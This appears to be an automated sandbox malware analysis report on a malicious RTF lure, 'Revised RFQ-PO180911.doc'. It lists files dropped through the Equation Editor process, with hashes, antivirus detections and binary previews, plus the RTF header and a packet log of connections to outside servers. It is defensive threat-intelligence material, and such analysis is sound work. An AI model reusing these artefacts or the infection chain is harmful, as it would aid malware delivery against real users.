                                                        Preview:...4Q....Ks.SU..=V&.4.....`.vN..Au....oi.k.s%...dH}.U...I$..U-s....M...ugf...7...2\....4.d......S.....h..........8.\..@.*`.B...6h"....c.Ki.....d#....-.H....*...~.c.....906z.......6/.&.?.>[.e_u.w.RO..3#00...d.dhH%"'.I.@...wY.g{C$..=...`....A.MKHQ..&...{i...&.<....z....N..AuK...oW...s%...!H}.U..F.I$0...s%.....?.X-W.?.zFkc...../V.C...........YG. ..Xi....8.\..@f9._..r.......!...o..P.....2x...6S .W8.V....c.....90.Hk.;...f.(/..>?M....._u.w.R..'..;..@p..dhH%"'.I....Y.g.Q$.....Q.`...~.*KHQ...&....{i.kC&.*....z.Z..vN..Au....oi.k.s%...dH}.U..F.I$0...s%.....?.X-W.?.zFkc...../V.C...........YG. ..Xi....8.\..@f9._..r.......!...o..P.....2x...6S .W8.V....c.....906z.......6/..>?MR...e_u.w.R..'..;...p..dhH%"'.I....Y.g.Q$.....Q.`...~.*KHQ...&....{i.kC&.*....z.Z..vN..Au....oi.k.s%...dH}.U..F.I$0...s%.....?.X-W.?.zFkc...../V.C...........YG. ..Xi....8.\..@f9._..r.......!...o..P.....2x...6S .W8.V....c.....906z.......6/..>?MR...e_u.w.R..'..;...p..dhH%"'.I

                                                        C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\word.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):191488
                                                        Entropy (8bit):6.541898820880567
                                                        Encrypted:false
                                                        SSDEEP:3072:afbnR6BqNvncvhwj8H0o45It38FSDblJpeKdsa9:MpvncWs0o4at3l9
                                                        MD5:9CECB9E88C1FF3D7A4FFC8BFEB27C2E1
                                                        SHA1:63223BA95BFA3BF5C33B2FA08376AFC90B35465E
                                                        SHA-256:78C9548A33ABD68ED553BB2A48166AFD21041B9D868A0373E4A11B93409DB049
                                                        SHA-512:BE4365F78F9DA5D3AB920100DEBF9A23F94101C5482DB6FBB8708913006483DF0A6DC882BAAC4D11EB942B464E548AC4F31A044F13FE6670B68DA1B95A2FDAAE
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 69%
                                                        Joe Sandbox View:
                                                        • Filename: H7CLAWIF5W.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z..4...4...4......4.....4......4.C.5...4...5...4...0...4......4...6...4.Rich..4.........................PE..L...1.b.................\...................p....@..........................P............@.......................................... .......................0......(...T..............................@............p...............................text....[.......\.................. ..`.rdata..fa...p...b...`..............@..@.data...,1..........................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\nstBFBE.tmp

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\word.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):392249
                                                        Entropy (8bit):7.457203020718996
                                                        Encrypted:false
                                                        SSDEEP:6144:QPy0ZnWWvtRfPTCZ5OmfYvEXvxdtpTuVOQz8jpvncWs0o4at3l9:UDZWqno5OmfYvqxd4dz81cWsIab9
                                                        MD5:6D2C377D4EAA999F9049920017F0AEBE
                                                        SHA1:C60DEEBEF6AB6F06B13801186B82B30B7EC07CF9
                                                        SHA-256:92820C32038F81C895428B292EBF5221903830336E08979AD68E54C1060B6DD8
                                                        SHA-512:588C7840DE4D228C65BA594F9837C4C29E5EB16E98FF0CE71584414CA46F396E25E45D447297D42111D743920A601902EC26EF5150501591D5CADF6DC7423956
                                                        Malicious:false
                                                        Preview:L.......,...................Q...........n.......4...........................................................................................................................................................................................................................................B...................j..........................................................................................................................................."...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\xxsjdcnfw

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\word.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):4830
                                                        Entropy (8bit):6.200355296128427
                                                        Encrypted:false
                                                        SSDEEP:96:lEgwdw+mcaoVVlbspZr/phpQDrbCGmrTJp4Fd0ZNN7juiOR/:11g/c/pQ3DFqBUR/
                                                        MD5:498C16613E82CEBCA0FC1541214BE952
                                                        SHA1:23E7DA2AA1B3EF5F3AEC1AE51F797DA4F421EFC5
                                                        SHA-256:7F40DA6288C8E939AFEA7A6512E518933D1802F6B822817B21E3B457AF445CE8
                                                        SHA-512:BA6B040C01B60827F893F918DE5478E83B53DA511EF62D0B10B2A12EC17F64C2FF64BD50DC1BE814809153AE90C913370010BACF22636FBD4820B409E6183A7B
                                                        Malicious:false
                                                        Preview:......].U..%..U.........x........U...|....U.t.y..y....(....._.._..y..y....(.b..._.._..y..y....(....._.._..y..y....(.<..._.._..U.......0......o_.x_.d]..U..._.._K.]..]K|...../q.]....|.._.|.._.tUd.......U....|y./y..y..0y../y.x.y..Cr... ].q. _Lt.U...y...]...._....|...........U...].t..]....-.....].''........]..]......]..].]K.].]..._.._.|]..]..]K._.]..].|.....................y................m..J..........].U..................._.|U.....].|...].|._.|].. _..}d. ...C...]..o../..._..._......o../.w._..._.......0.....(..y.......(..{yy_.t}....(y....yyy_.tU.t...U..}........].......].U..................._.|U.....].|...].|._.|].. _..}d.o...C..D^...]..o../..._..._...]..o../.w._..._...]..o../.w_..._...]........._.._L....o../.w._..._.......0.....(.....v...(..|yy_.tU.....]..]K._.}.y..y..y..y..y....zyy_.tU.t...U..}........].......].U.........d_.|U.....].|...].|._.|].. _..}d.6...C...]..o../..._..d_...]..o../.w._..d_.......0.....d(...m......(..|yy_.t}.y..y...1{y

                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Revised RFQ-PO180911.LNK

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:54 2022, mtime=Tue Mar 8 15:45:54 2022, atime=Sat May 28 03:20:14 2022, length=4205, window=hide
                                                        Category:dropped
                                                        Size (bytes):1064
                                                        Entropy (8bit):4.561334084261307
                                                        Encrypted:false
                                                        SSDEEP:12:8J2LpgXg/XAlCPCHaXBKBnB/xQpX+WhsxaibJticvbc2AksJJDtZ3YilMMEpxRlb:8J2T/XTRKJIoxtb2eQ243Dv3qIY7h
                                                        MD5:7A0827D76EE99E21650DB99266382AA1
                                                        SHA1:8D3328AF1607BCBA9B99539719B3C101BD51BE2D
                                                        SHA-256:EEB5D0D80D9AE296DA2B4B4D1BF6AFC4B5CBCACCF2C2948C7D4581971015CE6E
                                                        SHA-512:E5A6713869D093AA09994BA31D61067AE1360950331B8034AF17B0D7767DAA6EB63D5D4CCA1ED2C2AC44E112B110235F192D6E6DE15BF07C592C8EA4DDD70006
                                                        Malicious:false
                                                        Preview:L..................F.... ....<a..3...<a..3.....:Jr..m............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2.m....T." .REVISE~1.DOC..^......hT..hT..*...r.....'...............R.e.v.i.s.e.d. .R.F.Q.-.P.O.1.8.0.9.1.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\Revised RFQ-PO180911.doc./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.v.i.s.e.d. .R.F.Q.-.P.O.1.8.0.9.1.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):91
                                                        Entropy (8bit):4.905985646870587
                                                        Encrypted:false
                                                        SSDEEP:3:bDuMJlvDzndVOLprXCmX1mQzndVOLprXCv:bCkHn+dzxn+dzs
                                                        MD5:CEBD1CC56D43DF635440E2ED8B4A5B04
                                                        SHA1:EF8682C6F0816F2C59F2F69BDE5FBF5C13133FCF
                                                        SHA-256:1A97AB0D3F171BB80E32696C0F6125743C6F20AEBA4B3FA4529EDB8277554681
                                                        SHA-512:8DC534B70B012E0E9CEDDAD42D133892FBDA6003F85E14CED563F3BC81169B81AC9A0ABE0D896E48D0A96B2DEC130067F08042EBF0EA63228DF458531E283350
                                                        Malicious:false
                                                        Preview:[folders]..Templates.LNK=0..Revised RFQ-PO180911.LNK=0..[doc]..Revised RFQ-PO180911.LNK=0..

                                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.4797606462020303
                                                        Encrypted:false
                                                        SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
                                                        MD5:1674A1C7C99CD9FAADA789F5E2AEB335
                                                        SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
                                                        SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
                                                        SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
                                                        Malicious:false
                                                        Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

                                                        C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):2
                                                        Entropy (8bit):1.0
                                                        Encrypted:false
                                                        SSDEEP:3:Qn:Qn
                                                        MD5:F3B25701FE362EC84616A93A45CE9998
                                                        SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                        SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                        SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                        Malicious:false
                                                        Preview:..

                                                        C:\Users\user\AppData\Roaming\word.exe

                                                        Download File
                                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Category:dropped
                                                        Size (bytes):299113
                                                        Entropy (8bit):7.946436383486754
                                                        Encrypted:false
                                                        SSDEEP:6144:B0YmjnZuHB7pD0VRQCReiNfi+UPKI//9d7j9OHv:WtgQnQJiNfipK81dQHv
                                                        MD5:C6E799EEEBA0345DE98B4E9A6AC76B82
                                                        SHA1:268BAFBD996997350D32521A0012602960C5D004
                                                        SHA-256:E17BFB8370C8BADF90756F650E1BE4794E77A57ABB3619C30789364756304759
                                                        SHA-512:B229294931FE70480A7CB0937B33311FA838E5B5F1AC880A1E8FD06B67DDEE6C4B691D9A0D93004BE86DEBA5300FAF55511CD910FAD56F89C4E79B5EEAD6F681
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Metadefender, Detection: 9%, Browse
                                                        • Antivirus: ReversingLabs, Detection: 62%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qJ...$...$...$./.{...$...%.;.$.".y...$..3....$.f."...$.Rich..$.........................PE..L.....iF.................Z...........2.......p....@..........................................................................s.......................................................................................p...............................text....Y.......Z.................. ..`.rdata..z....p.......^..............@..@.data...............p..............@....ndata.......@...........................rsrc................t..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\Desktop\~$vised RFQ-PO180911.doc

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):162
                                                        Entropy (8bit):2.4797606462020303
                                                        Encrypted:false
                                                        SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
                                                        MD5:1674A1C7C99CD9FAADA789F5E2AEB335
                                                        SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
                                                        SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
                                                        SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
                                                        Malicious:false
                                                        Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

                                                        Static File Info

                                                        General

                                                        File type:data
                                                        Entropy (8bit):4.757042986275398
                                                        TrID:
                                                        • Rich Text Format (4004/1) 100.00%
                                                        File name:Revised RFQ-PO180911.doc
                                                        File size:4205
                                                        MD5:afaa3f4a9a241593ea30e05773c22980
                                                        SHA1:1d9dabc7f48e7d3c50c3d7d36a371be6bb63746d
                                                        SHA256:25966cc19f04cbbdacdf04249247d606c037cb527669addbfb0d52e0cd948519
                                                        SHA512:dd13ab1647bda04ee24a67f858c477657a7029d25a03f704b5d946930b75886f3f04360b132631d220709ccf4430ce40871033441510fba5923a8355c3f1816b
                                                        SSDEEP:96:rXNv4zQBSRu6lT85c98HwedaKR/UHpTQXbfZauPjspq:r9ALHTqc98Q2fR/UJTQXjAo
                                                        TLSH:7B815D33B65C5EA7D729C5FD424B7D569252F1670FCFA840315CD99003697B08A6C1E1
                                                        File Content Preview:{\rtF3245{\object53103277 \objocx88498732\objw1025\objh9295{\*\objdata913763 {\bin00000000 {\*\objdata913763 } \*\from771564180771564180 HSSnyM9uPxlyjjXd27hWYJB7.59Zdx5NZFDEVBRnWKalWrjLy4Xp790TBCTh1QhPwoRhik6h23}.{\*\ensp

                                                        File Icon

                                                        Icon Hash:e4eea2aaa4b4b4a4

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 27, 2022 21:20:07.545912027 CEST4917380192.168.2.22194.9.94.86
                                                        May 27, 2022 21:20:07.585800886 CEST8049173194.9.94.86192.168.2.22
                                                        May 27, 2022 21:20:07.585885048 CEST4917380192.168.2.22194.9.94.86
                                                        May 27, 2022 21:20:07.586997986 CEST4917380192.168.2.22194.9.94.86
                                                        May 27, 2022 21:20:07.625652075 CEST8049173194.9.94.86192.168.2.22
                                                        May 27, 2022 21:20:07.626665115 CEST8049173194.9.94.86192.168.2.22
                                                        May 27, 2022 21:20:07.626735926 CEST4917380192.168.2.22194.9.94.86
                                                        May 27, 2022 21:20:07.750381947 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.063146114 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.063292980 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.064167976 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.378580093 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.378611088 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.378627062 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.378640890 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.378660917 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.378679037 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.378696918 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.378712893 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.378729105 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.378746986 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.378770113 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.378803968 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.378808022 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.378810883 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.389332056 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.691915035 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.691951036 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.691963911 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.691977024 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.691988945 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.692003012 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.692270994 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.721050024 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.721085072 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.721101046 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.721113920 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.721132040 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.721144915 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.721163034 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.721175909 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.721191883 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.721209049 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.721225023 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.721242905 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.721287966 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.721925974 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.721942902 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.721947908 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:08.777307034 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.777344942 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:08.777530909 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.005276918 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.005310059 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.005328894 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.005347967 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.005359888 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.005378962 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.005394936 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.005413055 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.005430937 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.005448103 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.005453110 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.005466938 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.005481005 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.005486012 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.005486012 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.005492926 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.005511045 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.005525112 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.009583950 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.064732075 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.064769983 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.064791918 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.064814091 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.064835072 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.064857006 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.064871073 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.064878941 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.064901114 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.064901114 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.064904928 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.064908028 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.064915895 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.064925909 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.064939022 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.064949036 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.064964056 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.065027952 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.065567970 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.104387999 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.104424953 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.104441881 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.104460955 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.104504108 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.104521036 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.104536057 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.104552984 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.104576111 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.104594946 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.104621887 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.104659081 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.104664087 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.104667902 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.104671001 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.105216026 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.174045086 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.174082041 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.174098969 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.174114943 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.174134016 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.174154043 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.174173117 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.174189091 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.174279928 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.175674915 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.417671919 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417716026 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417736053 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417752028 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417771101 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417787075 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417805910 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417824030 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417845964 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417866945 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417891026 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417912960 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.417916059 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417943001 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417954922 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.417960882 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.417965889 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.417968988 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.417972088 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.417987108 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.417994022 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.418019056 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.418023109 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.418035030 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.418041945 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.418071032 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.418082952 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.418507099 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.502178907 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.502218008 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.502235889 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.502253056 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.502269983 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.502373934 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.503268003 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.533480883 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533521891 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533545971 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533566952 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533590078 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533611059 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533637047 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533664942 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.533709049 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.533765078 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.533771992 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.533778906 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.580378056 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580405951 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580425978 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580444098 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580465078 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580504894 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.580524921 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.580527067 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580529928 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.580547094 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580568075 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.580576897 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.580601931 CEST4917480192.168.2.2245.120.185.113
